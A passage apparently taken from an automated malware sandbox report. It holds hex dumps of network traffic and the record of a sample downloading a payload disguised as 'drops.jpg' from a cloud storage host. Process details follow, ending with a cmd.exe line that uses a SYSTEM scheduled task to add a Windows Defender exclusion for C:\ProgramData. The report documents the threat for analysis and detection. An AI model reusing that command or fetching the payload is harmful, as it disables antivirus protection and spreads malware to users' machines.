                                                                            2025-01-15 08:03:37 UTC4096INData Raw: 9d 9f 9f 31 ed f5 f4 9e 9f 9f 32 88 1d 9d 60 60 e3 a4 70 ed e5 f4 9e 9f 9f 30 ed ed 10 5d 5f 5f f1 5f b5 30 d2 a2 b0 ca a0 c8 20 a0 a0 a0 ca a2 ca a0 ca a2 c8 a0 a0 a0 e0 c8 a0 4c a2 f0 1f f5 74 92 e2 f0 69 65 84 1d 1f 1f 63 5d 84 1d 1f 1f 1f 95 e7 d3 20 09 0a e0 e0 e0 8a e0 6d 35 cc 5d 5f 5f f2 2b e5 a8 f0 48 06 5c a0 a0 23 64 a4 2b ed ac 8b 68 23 49 a1 f1 2b f5 a8 f2 48 f1 9c 60 60 e3 a4 64 eb 2d 68 ed 34 61 61 32 eb e5 04 9d 9f 9f 30 9f 75 f8 12 62 70 eb ed 04 9d 5f 5f f1 5f b5 44 d2 a2 b0 c8 54 a1 a0 a0 5f b5 6c d2 a2 b0 ca a1 c8 8c 4c a2 b0 48 61 5c 5f 5f 63 24 e8 8a e0 88 b8 0c e2 f0 08 dd 1b e0 e0 63 24 e8 63 18 1f 94 d0 8a e0 8a e0 8a e0 6d 75 18 5e 5f 5f f2 c8 24 4c a2 b0 ca a0 5f b5 a0 d3 a2 b0 ca a0 01 68 ec a5 b0 f0 5f b5 3c d2 a2 b0 ca 60 9f
                                                                            Data Ascii: 12``p0]___0 Ltiec] m5]__+H\#d+h#I+H``d-h4aa20ubp___DT_lLHa\__c$c$cmu^__$L_h_<`
                                                                            2025-01-15 08:03:37 UTC4096INData Raw: 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 44 45 46 47 48 49 4e 4e 4e 4a 4b 4e 8e 8e 8c 8d f5 2b 4c 21 4c 18 a2 a0 a0 29 2d e8 5d 5f 5f c8 ac 4e a2 b0 48 3e a3 a0 a0 23 64 a4 8a e0 88 f4 0e e2 f0 08 d5 0d 1f 1f 63 24 e8 8a e0 88 d0 0e e2 f0 08 c6 0d 1f 1f 63 24 e8 88 08 a3 a0 a0 5f b5 6c d2 a2 b0 c8 e8 4e a2 b0 5f b5 20 d2 a2 b0 c8 c0 4e a2 b0 5f b5 20 d2 a2 b0 c8 88 63 60 60 9f 75 ac 12 62 70 08 64 61 60 60 ed e5 98 9e 9f 9f 30 0a 60 9f 75 e4 12 62 70 a6 e5 24 5e 5f 5f eb 66 25 25 5e 5f 5f e5 66 25 26 5e 5f 5f f2 66 25 27 5e 5f 5f ee 66 25 28 5e 5f 5f a5 26 65 69 1e 1f 1f ac 26 65 6a 1e 1f 1f d3 26 65 6b 1e 1f 1f d2 26 65 6c 1e 1f 1f ce 26 65 6d 5e 5f 5f c4 66 25 2e 5e 5f 5f cc 66 25 2f 5e 5f 5f cc 66 25 30 5e 5f 5f a0 66 25 d4 5e 5f 5f e7 a6 e5
                                                                            Data Ascii: NNNNNNNNNNNNNNNNNDEFGHINNNJKN+L!L)-]__NH>#dc$c$_lN_ N_ c``ubpda``0`ubp$^__f%%^__f%&^__f%'^__f%(^__&ei&ej&ek&el&em^__f%.^__f%/^__f%0^__f%^__
                                                                            2025-01-15 08:03:37 UTC4096INData Raw: 90 12 62 70 d8 61 60 60 60 8b 62 8b 80 eb 85 3d a3 35 eb 8c e3 8c 08 37 eb 25 68 e9 25 38 66 e5 3c a0 19 b8 a0 a0 a0 93 60 2d dd 3d 53 0b c6 0b 0a ca c4 2b ed 38 f1 2d f5 3c f2 48 92 2f e0 e0 63 24 ec 6d a5 7c b0 6b ed 28 09 e2 f0 b1 88 78 a5 e5 f0 6b b5 78 63 22 84 b2 08 df 1f 5f 5f 23 64 b0 93 60 ff 2b 45 fd 62 a4 a0 f5 2b 4c ca a0 01 68 49 a2 b0 f0 c8 38 e5 a5 b0 2b ed 68 31 88 7a 9f 9f 9f e3 a4 70 53 a0 3d a2 64 60 35 eb 8c 0a 60 c1 60 60 60 70 30 08 60 60 60 70 2b ed a8 f1 48 58 5e 5f 5f 23 64 b0 93 60 fd 62 a4 a0 f5 2b 4c 21 4c 80 a4 a0 a0 f7 c8 cc 4f a2 f0 1f f5 68 92 e2 f0 69 a5 18 d3 20 86 41 6a dd e5 f0 65 20 95 e5 09 a7 e1 e0 e0 d3 29 86 6b ed 2a 9d a5 b0 29 ed 5c 2b f5 5c 61 42 aa 29 f5 50 ca a0 c8 20 a0 a0 a0 ca a4 ca a0 ca a2 c8 a0 a0 60 20
                                                                            Data Ascii: bpa```b=57%h%8f<`-=S+8-<H/c$m|k(xkxc"__#d`+Eb+LhI8+h1zpS=d`5````p0```p+HX^__#d`b+L!LOhi Aje )k*)\+\aB)P `
                                                                            2025-01-15 08:03:37 UTC4096INData Raw: 60 60 eb 25 68 30 ed ed 40 9d 9f 9f 31 88 00 df 60 60 e3 a4 6c a6 e5 f8 9e 9f 9f 60 d9 f9 a0 a0 a0 93 60 2d 1d 39 5e 5f 5f 53 0b c6 0b 0a ca a0 ca a0 ca a2 ca a0 ca a1 c8 a0 a0 a0 e0 6d 75 cc 1e 1f 1f b2 1f f5 74 92 e2 f0 69 65 70 1e 1f 1f 63 5d 70 1e 1f 1f 1f 95 e7 d3 20 09 11 a0 a0 a0 ca a0 2d 25 34 5e 5f 5f f0 2b ed ac 21 49 d0 a1 a0 a0 f1 2b f5 a8 21 62 d0 a1 a0 a0 f2 eb e5 f0 9e 9f 9f 30 9f 75 f8 12 62 70 e5 a0 15 67 53 a0 89 dc 60 60 60 eb ed f0 9e 9f 9f 31 9f b5 a4 ed a5 b0 2d 35 88 5d 5f 5f f2 48 c4 6c a0 a0 23 64 a4 25 60 d4 85 2d 25 88 5d 5f 5f f0 2d 6d cc 1e 1f 1f b1 88 6c 11 e2 f0 6d 75 78 1e 1f 1f b2 1f f5 b4 ad e5 f0 63 24 f0 0b f4 6d 65 cc 5e 5f 5f f0 2d 2d 38 5e 5f 5f f1 5f b5 68 d2 a2 b0 2b 35 84 5d 5f 5f 29 35 bc 5d 5f 5f 23 1d bc 9d 9f
                                                                            Data Ascii: ``%h0@1``l``-9^__Smutiepc]p -%4^__+!I+!b0ubpgS```1-5]__Hl#d%`-%]__-mlmuxc$me^__--8^___h+5]__)5]__#
                                                                            2025-01-15 08:03:37 UTC4096INData Raw: ac ac 35 eb 8c 53 a0 c0 4c c6 65 70 e3 80 61 e5 a0 15 6f ea 6d 4c c6 65 70 e0 a9 61 e8 ad 8c 06 a5 b0 fd 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 ac 2a e8 6b b5 1c 68 ea 8a e0 6b ad 1c 08 f5 e2 e0 e0 6b a5 e8 b0 6b ad 1c 08 a9 e1 e0 e0 6b a5 1c 6b 45 fd 62 a8 a0 f5 2b 4c f1 29 ed 5c ca a1 2b ed 5c 48 4f a1 a0 a0 2b 45 fd 63 6c 6c 6c 6c 6c 6c ac ac ac ac ac 35 eb 8c 31 e9 2d 9c ea 25 68 30 0a 61 eb 2d 9c 88 eb 60 60 60 eb 85 3d a2 64 60 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 5c 2b e8 a8 9b ed a8 d7 a5 48 c2 c9 a1 a0 2b ed 5c 48 f1 e1 e0 e0 6b b5 1c 6b a2 e4 e3 a5 e8 6b 05 bd 22 e4 e0 2c 2c b5 6b 0c 63 0c e8 69 ad 1c 6b a5 5c 23 d8 a4 a0 d5 aa 48 c9 a1 a0 a0 29 e5 58 4b a9 2b ed 5c 2b f1 a4 29 f5 58 2b e5 58 2b 45 fd a3 ac
                                                                            Data Ascii: 5SLepaomLepacllllllllllllll+L)\+*khkkkkkEb+L)\+\HO+Ecllllll51-%h0a-```=d`lllll+L)\+\+H+\Hkkk",,kcik\#H)XK+\+)X+X+E
                                                                            2025-01-15 08:03:37 UTC4096INData Raw: e3 98 1d 15 6a a7 65 0c 94 62 70 60 60 60 60 e3 5d 0c 94 62 70 60 14 41 08 12 74 60 60 5f b5 6c d2 a2 b0 2b 2d 44 5e 5f 5f 48 7c 5c 5f 5f 2b 2d 44 5e 5f 5f 48 ff 5d 5f 5f 2b ed 54 c4 69 ed e0 e0 e0 e0 bf be bb 6b 05 bd 22 e8 e0 2c 2c 2c 2c 2c 2c b5 6b 0c b1 69 ad 1c 6b ad 1c 08 23 5c 5f 5f 2b e5 a8 23 40 a1 25 60 d4 ac 2b ed 5c f1 48 53 3e a0 a0 23 64 a4 2b e5 5c 2b 45 fd a2 64 60 ac ac 35 eb 8c 88 67 60 60 60 88 71 60 60 60 3d a3 35 eb 8c d9 ad 2c 65 70 88 75 3c 61 a0 fd 63 f5 2b 4c c8 f0 d7 a0 b0 48 10 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6d ec a5 b0 48 d3 fd e1 e0 bd 23 b5 6b 0c 08 e7 e0 e0 e0 08 f1 e0 e0 e0 bd 23 b5 6b 0c 59 2c ac e5 f0 08 30 89 e1 e0 fd 63 f5 2b 4c c8 2f d7 a0 b0 48 d1 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6c ec a5 b0 48 90 cb a1 60 3d
                                                                            Data Ascii: jebp````]bp`At``_l+-D^__H|\__+-D^__H]__+Tik",,,,,,kik#\__+#@%`+\HS>#d+\+Ed`5g```q```=5,epu<ac+LH#dc+LmH#k#kY,0c+L/H#dc+LlH`=
                                                                            2025-01-15 08:03:37 UTC4096INData Raw: 25 d0 30 9f 75 4c 10 62 70 eb 2d f8 e9 2d e4 eb 35 d0 32 9f 75 84 12 62 70 eb 25 cc 30 5f b5 44 d2 a2 b0 2b ed 24 29 ed 18 4b a7 67 e5 18 a0 a0 a0 a0 23 dd 14 a0 d4 aa 2b f5 14 f2 5f f5 ec 92 e2 f0 6b a5 58 6b 05 bd 23 b5 6b 0c 61 0c 7c e5 e0 e0 88 df 68 e0 f0 88 50 3d e4 f0 1f b5 80 d0 a2 b0 03 54 ed a5 b0 67 a5 58 ed a5 b0 80 a0 a0 a0 67 a5 a0 ee a5 b0 a7 a0 a0 a0 67 a5 64 2e 65 70 60 60 60 60 a7 65 70 2e 65 70 b0 67 60 60 a7 65 6c 2e 65 70 61 60 60 60 a7 65 9c 2d a5 b0 a2 a0 a0 a0 c8 58 ed a5 b0 01 54 ed a5 b0 f0 5f b5 c4 d0 a2 b0 67 a5 ac ee a5 b0 a0 a0 a0 e0 88 14 e1 e0 e0 1f f5 2c 92 e2 f0 27 65 8c 1f 1f 1f 74 e0 e0 e0 6d 6d 8c 1f 1f 1f b1 1f f5 f8 d2 a2 b0 23 1d d0 5f 5f 5f a6 d3 96 67 a5 5c ed a5 b0 a4 a0 a0 a0 c8 58 ed a5 b0 2b b5 54 ed a5 70 32
                                                                            Data Ascii: %0uLbp--52ubp%0_D+$)Kg#+_kXk#ka|hP=TgXggd.ep````ep.epg``el.epa```e-XT_g,'etmm#___g\X+Tp2


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.449996118.178.60.94437752C:\Users\user\Documents\0b1G0H.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 08:03:39 UTC114OUTGET /drops.jpg HTTP/1.1
                                                                            User-Agent: GetData
                                                                            Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                            Cache-Control: no-cache
                                                                            2025-01-15 08:03:40 UTC545INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Wed, 15 Jan 2025 08:03:40 GMT
                                                                            Content-Type: image/jpeg
                                                                            Content-Length: 37274
                                                                            Connection: close
                                                                            x-oss-request-id: 67876BDCECB4DB3636388847
                                                                            Accept-Ranges: bytes
                                                                            ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7"
                                                                            Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 9193697774326766004
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000105
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: bU3rlSbzlz3g+dzpOS+Opw==
                                                                            x-oss-server-time: 1
                                                                            2025-01-15 08:03:40 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31
                                                                            Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
                                                                            2025-01-15 08:03:40 UTC4096INData Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc
                                                                            Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;|6@q_^/f
                                                                            2025-01-15 08:03:40 UTC4096INData Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5
                                                                            Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h|
                                                                            2025-01-15 08:03:40 UTC4096INData Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38
                                                                            Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR|u9g39Z_?|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-*Qm[Q27Gahf*'h&<yw98
                                                                            2025-01-15 08:03:40 UTC4096INData Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56
                                                                            Data Ascii: ;<=wJBDEVUV}*hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z*#i+l3y;!"#$bBoKtAqV
                                                                            2025-01-15 08:03:40 UTC4096INData Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb
                                                                            Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
                                                                            2025-01-15 08:03:40 UTC4096INData Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3
                                                                            Data Ascii: ctABCKw4|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT*&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=*SV.c{]=bh&g}|6
                                                                            2025-01-15 08:03:40 UTC4096INData Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 39
                                                                            Data Ascii: t'FCDEhNOP}bBibcd- O|lno=\{{|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
                                                                            2025-01-15 08:03:40 UTC4096INData Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe
                                                                            Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhij*Jpqrs<Syz{4s%~}k*yxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
                                                                            2025-01-15 08:03:40 UTC955INData Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20
                                                                            Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8*Sp1l_g;#c!;3c"#%+''&k*+-#//>S235-77


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:03:02:11
                                                                            Start date:15/01/2025
                                                                            Path:C:\Users\user\Desktop\138745635-72645747.116.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Users\user\Desktop\138745635-72645747.116.exe"
                                                                            Imagebase:0x140000000
                                                                            File size:30'950'400 bytes
                                                                            MD5 hash:6DA3AF3E9AB312F971A0BC0171919175
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:4
                                                                            Start time:03:02:47
                                                                            Start date:15/01/2025
                                                                            Path:C:\Users\user\Documents\0b1G0H.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Users\user\Documents\0b1G0H.exe
                                                                            Imagebase:0x140000000
                                                                            File size:133'136 bytes
                                                                            MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 0%, ReversingLabs
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:5
                                                                            Start time:03:02:49
                                                                            Start date:15/01/2025
                                                                            Path:C:\Users\user\Documents\0b1G0H.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Users\user\Documents\0b1G0H.exe
                                                                            Imagebase:0x140000000
                                                                            File size:133'136 bytes
                                                                            MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:6
                                                                            Start time:03:03:00
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
